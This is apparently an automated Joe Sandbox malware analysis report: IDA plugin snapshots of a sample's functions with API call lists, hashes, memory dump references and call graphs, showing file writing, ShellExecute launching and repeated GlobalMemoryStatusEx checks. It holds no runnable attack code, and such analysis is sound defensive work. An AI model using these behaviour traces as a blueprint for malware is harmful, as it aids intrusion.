                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 920484758-0
                                                                                                                                • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                • Instruction ID: 5b190c14df617428032a2f44cba9ca7e7b247a1af6a815ce07d1fd8903bd5442
                                                                                                                                • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                • Instruction Fuzzy Hash: 2E410A75A012299FCB66DB58CC94BC9B3BDEF49314F4041D5E948A7211DA34EF808FA4
                                                                                                                                APIs
                                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                                • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3990497365-0
                                                                                                                                • Opcode ID: ca0e8f95d9a204321cf05a1a43cc9dbe938841dac204b9c77b1a3de21951f63c
                                                                                                                                • Instruction ID: d58cfe81125ad10bfdf3ba6542c7014e81ca62ecfa7c7af2931d1908ae09dd76
                                                                                                                                • Opcode Fuzzy Hash: ca0e8f95d9a204321cf05a1a43cc9dbe938841dac204b9c77b1a3de21951f63c
                                                                                                                                • Instruction Fuzzy Hash: BB414971A012589FDB21EB68CD84BDAB7FDAB08340F9400EAE548E7245DB74AF84CF50
                                                                                                                                APIs
                                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                                • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3990497365-0
                                                                                                                                • Opcode ID: 79bdac5c566b234745e3af12ccfa1e7ea3f3ddda7ed48123e5c27b4f23f493b1
                                                                                                                                • Instruction ID: 1074368ccee03c30cad020c43305fa14c04f6342f3ac3594c4c1881c073b42c8
                                                                                                                                • Opcode Fuzzy Hash: 79bdac5c566b234745e3af12ccfa1e7ea3f3ddda7ed48123e5c27b4f23f493b1
                                                                                                                                • Instruction Fuzzy Hash: 7D415A71A012589FDB21EB68CD84BDAB7FDAB08340F9400E6E648E7241DB74AF84CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: aaced1d7cb12c90a3f5fb177e5084d5a1e52c2b2e4256292f5dedc8702e22f98
                                                                                                                                • Instruction ID: 95a2c0ca5b1a6ae30791099c0ebec8e30aef967f8a9290670022a8f0b22fa17b
                                                                                                                                • Opcode Fuzzy Hash: aaced1d7cb12c90a3f5fb177e5084d5a1e52c2b2e4256292f5dedc8702e22f98
                                                                                                                                • Instruction Fuzzy Hash: 2CA1F9777306040BD718AA7C9D803BDB3D6DBC5265F9882BED31DCB385EB68C9528650
                                                                                                                                APIs
                                                                                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B195DA), ref: 02B19572
                                                                                                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B195DA), ref: 02B19578
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DateFormatLocaleThread
                                                                                                                                • String ID: yyyy
                                                                                                                                • API String ID: 3303714858-3145165042
                                                                                                                                • Opcode ID: 5cf10a9f76e784836047e293daf1c1a45dde89d4bd5289fd47833940f1f94b8f
                                                                                                                                • Instruction ID: 8676353fc7cd72329d1871b5d1e38ff6baba3b5ab980d0207943815eea3dd7c6
                                                                                                                                • Opcode Fuzzy Hash: 5cf10a9f76e784836047e293daf1c1a45dde89d4bd5289fd47833940f1f94b8f
                                                                                                                                • Instruction Fuzzy Hash: D2217C71A006989FDB10DFA8C891AAEB7B9EF09700F9104E5E905E7251DB30DE40CBA5
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                • String ID: FlushInstructionCache$Kernel32
                                                                                                                                • API String ID: 3811539418-184458249
                                                                                                                                • Opcode ID: 784adca8a7e384750a369b37498409c999472911133d5b67b57caf007e2d1212
                                                                                                                                • Instruction ID: 616b8a28569c6041a2362061019d9ee7c4397ed36f089c6be7e56f977986e096
                                                                                                                                • Opcode Fuzzy Hash: 784adca8a7e384750a369b37498409c999472911133d5b67b57caf007e2d1212
                                                                                                                                • Instruction Fuzzy Hash: F2016DB1654304AFEB00EFA4DD41F5A77EDE708B40FA184A0F908D7650DA74AD159A29
                                                                                                                                APIs
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2AF58
                                                                                                                                • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B2AF88
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B2AFA7
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2AFB3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Read$Write
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3448952669-0
                                                                                                                                • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                • Instruction ID: 3db4d0fc2c1fb154ba514444d524e1075af158aa2dd4818251ed6f8d859da57b
                                                                                                                                • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                • Instruction Fuzzy Hash: EC2184B264072A9BDB10DF69CCC0BAE77A9EF44351F004591FD18D7384E738E9158AA4

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:27.8%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:3.1%
                                                                                                                                Total number of Nodes:32
                                                                                                                                Total number of Limit Nodes:2

                                                                                                                                Callgraph

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000001.2173137456.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000001.2173137456.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000001.2173137456.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                                • String ID: %s\%s
                                                                                                                                • API String ID: 2742963760-4073750446
                                                                                                                                • Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                                • Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
                                                                                                                                • Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                                • Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000001.2173137456.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000001.2173137456.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000001.2173137456.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2992075992-0
                                                                                                                                • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                                • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                                                • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                                • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000001.2173137456.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000001.2173137456.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000001.2173137456.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1611591150-0
                                                                                                                                • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                                • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                                                • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                                • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000001.2173137456.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000001.2173137456.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000001.2173137456.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: malloc
                                                                                                                                • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                                                • API String ID: 2803490479-2443507578
                                                                                                                                • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                                • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                                                • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                                • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000001.2173137456.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000001.2173137456.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000001.2173137456.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                                                • String ID: D`:vD`:v$D`:vD`:v
                                                                                                                                • API String ID: 4108700736-3916433284
                                                                                                                                • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                                • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                                                • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                                • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000001.2173137456.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000001.2173137456.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000001.2173137456.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                                                • Instruction ID: 66f553c3c70c46b8825420ed88d2deaa6b5bdf89b3e430e74c23cac08a3ac52f
                                                                                                                                • Opcode Fuzzy Hash: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                                                • Instruction Fuzzy Hash: 65A00457F1D540DFD71317107C5515037745F1554575D4CF3445545053D11D44445535

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:13.3%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:182
                                                                                                                                Total number of Limit Nodes:23
                                                                                                                                execution_graph 25111 ef7ea8 25114 ef7eb2 25111->25114 25112 ef7ecc 25113 ef7f12 25112->25113 25129 eff7bf 25112->25129 25134 eff612 25112->25134 25114->25112 25119 657fb58 25114->25119 25124 657fb68 25114->25124 25121 657fb7d 25119->25121 25120 657fd92 25120->25112 25121->25120 25122 efe1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25121->25122 25123 efdf00 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25121->25123 25122->25121 25123->25121 25126 657fb7d 25124->25126 25125 657fd92 25125->25112 25126->25125 25127 efe1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25126->25127 25128 efdf00 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25126->25128 25127->25126 25128->25126 25130 eff7ca 25129->25130 25132 657fb58 3 API calls 25130->25132 25133 657fb68 3 API calls 25130->25133 25131 eff7d1 25131->25113 25132->25131 25133->25131 25135 eff639 25134->25135 25136 eff6af 25135->25136 25139 eff840 25135->25139 25145 eff850 25135->25145 25140 eff850 25139->25140 25141 eff883 25140->25141 25151 effa87 25140->25151 25158 eff890 25140->25158 25165 effb06 25140->25165 25141->25135 25146 eff855 25145->25146 25147 eff883 25146->25147 25148 effa87 3 API calls 25146->25148 25149 effb06 3 API calls 25146->25149 25150 eff890 3 API calls 25146->25150 25147->25135 25148->25146 25149->25146 25150->25146 25153 eff916 25151->25153 25152 effb32 25152->25152 25153->25152 25156 effb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25153->25156 25157 effb6a GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25153->25157 25172 efff9c 25153->25172 25176 effd19 25153->25176 25156->25153 25157->25153 25160 eff8b7 25158->25160 25159 effb32 25160->25159 25161 efff9c 3 API calls 25160->25161 25162 effb6a GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25160->25162 25163 effd19 3 API calls 25160->25163 25164 effb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25160->25164 25161->25160 25162->25160 25163->25160 25164->25160 25167 eff916 25165->25167 25166 effb32 25167->25166 25168 efff9c 3 API calls 25167->25168 25169 effb6a GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25167->25169 25170 effd19 3 API calls 25167->25170 25171 effb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25167->25171 25168->25167 25169->25167 25170->25167 25171->25167 25175 effd47 25172->25175 25174 effd8a 25174->25153 25175->25174 25180 efdf00 25175->25180 25177 effd47 25176->25177 25178 efdf00 3 API calls 25177->25178 25179 effd8a 25177->25179 25178->25177 25179->25153 25186 efdf1a 25180->25186 25181 efe22f 25189 efe5a8 25181->25189 25182 efe345 25193 efeed0 25182->25193 25183 efe239 25183->25175 25184 efdf6b 25184->25175 25186->25181 25186->25182 25186->25184 25197 efea71 25189->25197 25201 efea80 25189->25201 25190 efe5df 25190->25183 25207 efef08 25193->25207 25215 efef18 25193->25215 25194 efe37e 25194->25175 25198 efea80 25197->25198 25200 efead5 25198->25200 25205 ef7b10 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25198->25205 25200->25190 25202 efea94 25201->25202 25204 efead5 25201->25204 25202->25204 25206 ef7b10 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25202->25206 25204->25190 25205->25200 25206->25204 25208 efef18 25207->25208 25209 efef25 25208->25209 25223 efe680 25208->25223 25209->25194 25211 efef6e 25211->25194 25213 eff036 GlobalMemoryStatusEx 25214 eff066 25213->25214 25214->25194 25216 efef4d 25215->25216 25217 efef25 25215->25217 25218 efe680 GlobalMemoryStatusEx 25216->25218 25217->25194 25220 efef6a 25218->25220 25219 efef6e 25219->25194 25220->25219 25221 eff036 GlobalMemoryStatusEx 25220->25221 25222 eff066 25221->25222 25222->25194 25224 efeff0 GlobalMemoryStatusEx 25223->25224 25226 efef6a 25224->25226 25226->25211 25226->25213 25227 ef7d90 25230 ef7da6 25227->25230 25228 ef7f03 25229 ef7f12 25228->25229 25234 eff7bf 3 API calls 25228->25234 25235 eff612 3 API calls 25228->25235 25230->25228 25231 ef7e57 25230->25231 25236 ef8708 25230->25236 25242 ef8750 25230->25242 25234->25229 25235->25229 25237 ef870d 25236->25237 25238 ef8f2d 25237->25238 25248 efa04b 25237->25248 25255 ef9f98 25237->25255 25262 ef9fa8 25237->25262 25238->25230 25243 ef8769 25242->25243 25244 ef8f2d 25243->25244 25245 efa04b 3 API calls 25243->25245 25246 ef9fa8 3 API calls 25243->25246 25247 ef9f98 3 API calls 25243->25247 25244->25230 25245->25243 25246->25243 25247->25243 25249 efa020 25248->25249 25250 efa061 25249->25250 25269 efa0a8 25249->25269 25276 efa098 25249->25276 25283 efa189 25249->25283 25298 efa1b3 25249->25298 25257 ef9fa8 25255->25257 25256 efa061 25257->25256 25258 efa0a8 3 API calls 25257->25258 25259 efa1b3 3 API calls 25257->25259 25260 efa189 3 API calls 25257->25260 25261 efa098 3 API calls 25257->25261 25258->25257 25259->25257 25260->25257 25261->25257 25263 ef9fc5 25262->25263 25264 efa061 25263->25264 25265 efa0a8 3 API calls 25263->25265 25266 efa1b3 3 API calls 25263->25266 25267 efa189 3 API calls 25263->25267 25268 efa098 3 API calls 25263->25268 25265->25263 25266->25263 25267->25263 25268->25263 25270 efa0c2 25269->25270 25271 efa182 25270->25271 25272 efa189 3 API calls 25270->25272 25275 efa1b3 3 API calls 25270->25275 25312 efa4d6 25270->25312 25320 efa2d8 25270->25320 25272->25270 25275->25270 25278 efa0a8 25276->25278 25277 efa182 25278->25277 25279 efa189 3 API calls 25278->25279 25280 efa2d8 3 API calls 25278->25280 25281 efa4d6 3 API calls 25278->25281 25282 efa1b3 3 API calls 25278->25282 25279->25278 25280->25278 25281->25278 25282->25278 25284 efa197 25283->25284 25286 efa0c2 25284->25286 25288 efa1ba 25284->25288 25285 efa182 25286->25285 25289 efa189 3 API calls 25286->25289 25290 efa2d8 3 API calls 25286->25290 25291 efa4d6 3 API calls 25286->25291 25292 efa1b3 3 API calls 25286->25292 25287 efa505 25287->25249 25288->25287 25293 efdf00 3 API calls 25288->25293 25294 efa189 3 API calls 25288->25294 25295 efa2d8 3 API calls 25288->25295 25296 efa4d6 3 API calls 25288->25296 25297 efa1b3 3 API calls 25288->25297 25289->25286 25290->25286 25291->25286 25292->25286 25293->25288 25294->25288 25295->25288 25296->25288 25297->25288 25300 efa1ba 25298->25300 25301 efa0c2 25298->25301 25299 efa182 25302 efa505 25300->25302 25303 efdf00 3 API calls 25300->25303 25304 efa189 3 API calls 25300->25304 25305 efa2d8 3 API calls 25300->25305 25306 efa4d6 3 API calls 25300->25306 25307 efa1b3 3 API calls 25300->25307 25301->25299 25308 efa189 3 API calls 25301->25308 25309 efa2d8 3 API calls 25301->25309 25310 efa4d6 3 API calls 25301->25310 25311 efa1b3 3 API calls 25301->25311 25302->25249 25303->25300 25304->25300 25305->25300 25306->25300 25307->25300 25308->25301 25309->25301 25310->25301 25311->25301 25314 efa1e1 25312->25314 25313 efa505 25313->25270 25314->25313 25315 efa189 3 API calls 25314->25315 25316 efa2d8 3 API calls 25314->25316 25317 efa4d6 3 API calls 25314->25317 25318 efa1b3 3 API calls 25314->25318 25319 efdf00 3 API calls 25314->25319 25315->25314 25316->25314 25317->25314 25318->25314 25319->25314 25322 efa1e1 25320->25322 25321 efa505 25321->25270 25322->25321 25323 efa189 3 API calls 25322->25323 25324 efa2d8 3 API calls 25322->25324 25325 efa4d6 3 API calls 25322->25325 25326 efa1b3 3 API calls 25322->25326 25327 efdf00 3 API calls 25322->25327 25323->25322 25324->25322 25325->25322 25326->25322 25327->25322

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
